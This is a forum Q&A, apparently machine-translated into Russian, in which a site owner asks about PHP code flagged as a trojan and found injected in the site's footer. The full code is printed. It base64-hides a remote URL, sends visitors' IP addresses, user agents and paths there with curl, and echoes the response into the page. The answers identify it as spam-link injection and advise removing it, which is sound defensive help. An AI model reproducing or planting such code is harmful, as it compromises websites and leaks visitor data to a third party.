Сегодня, когда я открыл свой сайт, ESET NOD32 предупредил меня о трояне и заблокировал его. Когда я проанализировал код, следующий код был в нижнем колонтитуле … Что это за код и какие преимущества он может получить (хакер), вставив этот код на мой сайт?
<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>
Для меня это похоже на какой-то аналитический код. Он отправляет информацию о запрошенном URL, удаленном IP-адресе, пользовательском агенте браузера и т. Д. На « http://mbrowserstats.com/statH/stat.php ». Я не знаком с этим конкретным сайтом, но он может быть законным. Иногда антивирусное программное обеспечение сообщает об этом неправильно.
Основываясь на нескольких поисках, это кажется немного 50/50. Похоже, что это не наносит огромного вреда, но может быть распространено путем взлома. Несколько примеров страниц, которые я нашел об этом:
Вероятно, безопаснее удалить его и следовать некоторым предложениям по предотвращению повторения.
Это не выглядит законным. Поиск одной из строк в коде показывает, что его вероятной целью является добавление ссылок на ваш сайт только при посещении поисковых систем.
Таким образом, это будет хорошо выглядеть, когда вы перейдете на сайт, но он будет полон рекламы спама для поисковых систем, которые, в свою очередь, увидят ваш сайт как поддерживающий множество ссылок, предназначенных для повышения их ранжирования по страницам ,
В любом случае, если вы не особо узнаете код, сохраните своих пользователей в безопасности и избавитесь от него. Если вы его не установили, вы должны выяснить, как этот код был установлен, так что это не повторится.